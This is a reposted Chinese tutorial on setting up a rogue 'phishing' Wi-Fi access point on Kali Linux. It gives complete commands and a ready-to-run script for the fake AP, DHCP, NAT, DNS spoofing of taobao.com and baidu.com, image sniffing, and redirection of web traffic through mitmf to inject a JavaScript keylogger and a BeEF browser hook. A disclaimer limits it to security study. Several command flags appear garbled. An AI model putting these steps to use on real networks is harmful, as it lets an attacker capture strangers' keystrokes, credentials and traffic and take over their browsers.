Kali-Linux下創建一個釣魚WiFi熱點


原文地址:http://www.freebuf.com/articles/wireless/69840.html

文中提及的部分技術可能帶有一定攻擊性,僅供安全學習和教學用途,禁止非法使用。請不要做一只咖啡館里安靜的猥瑣大叔。

寫在前面

從至少一年前我就一直想在自己跑kali的筆記本上架個釣魚熱點。然而由於網上的教程的nat寫得有問題,別人寫好的腳本和我電腦有些互不待見,最接近成功的一次只做到了qq能聊天,百度都上不去。

而最近忽然意識到了問題的所在,成功實現了建立wifi熱點,dns劫持,js注入,圖片嗅探,和BEEF結合對用戶瀏覽器進行攻擊測試。

故寫此文分享給大家,希望與之前的我有一樣困惑的同志們能有所收獲。

建立熱點

工具:isc-dhcp-server  ;Aircrack-ng套件;iptables

建立過程:

首先寫dhcp配置文件/etc/dhcp/dhcpd.conf

寫入如下內容:

authoritative; default-lease-time 700; #默認租期 max-lease-time 8000; #最長租期 
subnet是自己網卡的IP neTMASK 子網掩碼 subnet 10.0.0.0 netmask 255.255.255.0 { option routers 10.0.0.1; 路由器地址 option subnet-mask 255.255.255.0; 分配的子網掩碼 option domain-name-servers 10.0.0.1;分配的DNS range 10.0.0.10 10.0.0.100; 分配的IP范圍 }

這里以10.0.0.1作為網關和dns服務器地址。

然后我們處理無線網卡

ifconfig wlan1 down           #wlan1修改成你的網卡 iwconfig wlan1 mode monitor ifconfig wlan1 up airmon-ng start wlan1

上述命令可以防止出現:Error: Got channel -1, expected a value > 0.

然后用airbase建立熱點

airbase-ng -Fishing -11 mon0

熱點的網絡流量會被虛擬到at0這塊網卡上面

ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

打開ip轉發

echo 1 > /proc/sys/net/ipv4/ip_forward

開啟dhcp

dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0 service isc-dhcp-server start

然后可以試着用手機連接,應該可以連上但上不了網

於是配置NAT

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE #對eth0進行源nat iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT #把無線網卡流量轉發到有線網卡(或者什么能上網的網卡)上面 iptables -A FORWARD -p tcp --syn -10.0.0.0/24 -j TCPMSS --set-mss 1356 #修改最大報文段長度

注意那第三個命令調整MSS,不加后果很嚴重(我就一直死在這里)

(這里可能還是DNS錯誤,請看后文中的dns代理服務器搭建)

劫持DNS

工具:dnschef

過程:

dnschef -10.0.0.1 --nameserver 210.73.64.1#53

上述命令是以ip10.0.0.1(上文中的fakeap網關和DNS的ip)建立dns,對於所有請求轉發到210.73.64.1進行解析。顯然這只是個“代理”並沒有劫持的功效

於是我們進化:

dnschef --fakedomains=taobao.com,baidu.com --fakeip=10.0.0.1 -10.0.0.1 --nameserver 210.73.64.1#53

把淘寶和百度解析到本機了。

當然可以把更多規則寫在文件里:

剩下的大家自由發揮吧。

p.s:這個和后文中mitmf沖突,mitmf識別http協議中的目的主機,進行轉發,不受這個dns偽造影響。

圖片嗅探

這是一個很好玩的功能

工具:driftnet

過程:

driftnet -i at0

然后程序會打開一個小窗口顯示所有傳輸的圖片:

單擊圖片保存到/

當然可以開啟 Adjunct mode:

driftnet -i at0 -a

直接保存圖片並顯示文件名。

劫持Web流量

這個更好玩

工具:BEEF;mitmf;iptables

過程:

先把80端口的流量劫持走(這里10000是mitmf默認監聽端口)

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

然后打開mitmf

mitmf -i at0 --replace --search-str aaaaa  --replace-str bbbbb#把所有網頁中的aaaaa替換成bbbbb

上圖百度了aaaaa

好吧不要惡作劇了,上干貨

mitmf -i at0 --inject --js-url http://10.0.0.1:3000/hook.js --jskeylogger

mitmf在這里注入了js鍵盤記錄器

和beef的攻擊測試腳本,其余的攻擊方式(比如javapwn)可以參考http://www.freebuf.com/tools/45796.html

最后用BEEF測試用戶瀏覽器吧!

/usr/share/beef-xss/beef

瀏覽器打開http://127.0.0.1:3000/ui/panel ,初始用戶名和密碼都是beef

BEEF過於高深我還沒玩得很清楚請大家自行探索。對了,不要忘了抓包

最后是我寫的腳本

#清空iptables iptables -t nat -F iptables -t nat -X   iptables -t nat -P PREROUTING ACCEPT   iptables -t nat -P POSTROUTING ACCEPT   iptables -t nat -P OUTPUT ACCEPT   iptables -t mangle -F   iptables -t mangle -X   iptables -t mangle -P PREROUTING ACCEPT   iptables -t mangle -P INPUT ACCEPT   iptables -t mangle -P FORWARD ACCEPT   iptables -t mangle -P OUTPUT ACCEPT   iptables -t mangle -P POSTROUTING ACCEPT   iptables -F   iptables -X   iptables -P FORWARD ACCEPT   iptables -P INPUT ACCEPT   iptables -P OUTPUT ACCEPT   iptables -t raw -F   iptables -t raw -X   iptables -t raw -P PREROUTING ACCEPT   iptables -t raw -P OUTPUT ACCEPT   #建立熱點 airmon-ng stop mon0 ifconfig wlan1 down           #wlan1修改成你的網卡 iwconfig wlan1 mode monitor ifconfig wlan1 up airmon-ng start wlan1 & sleep 2                   gnome-terminal -x bash -"airbase-ng -e Fishing -c 11 mon0"              #按需求修改 sleep 2 ifconfig at0 up ifconfig at0 10.0.0.1 netmask 255.255.255.0 ifconfig at0 mtu 1400 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 echo 1 > /proc/sys/net/ipv4/ip_forward #配置dhcp dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0 sleep 2 /etc/init.d/isc-dhcp-server start  #nat iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT iptables -A FORWARD -p tcp --syn -s 10.0.0.0/24 -j TCPMSS --set-mss 1356 #劫持80 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 #劫持dns gnome-terminal -x bash -c "dnschef -i 10.0.0.1 --nameserver 210.73.64.1#53" #打開beef並進行80js鍵盤記錄 gnome-terminal -x bash -c "mitmf -i at0 --inject --js-url http://10.0.0.1:3000/hook.js --jskeylogger" beef-xss


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM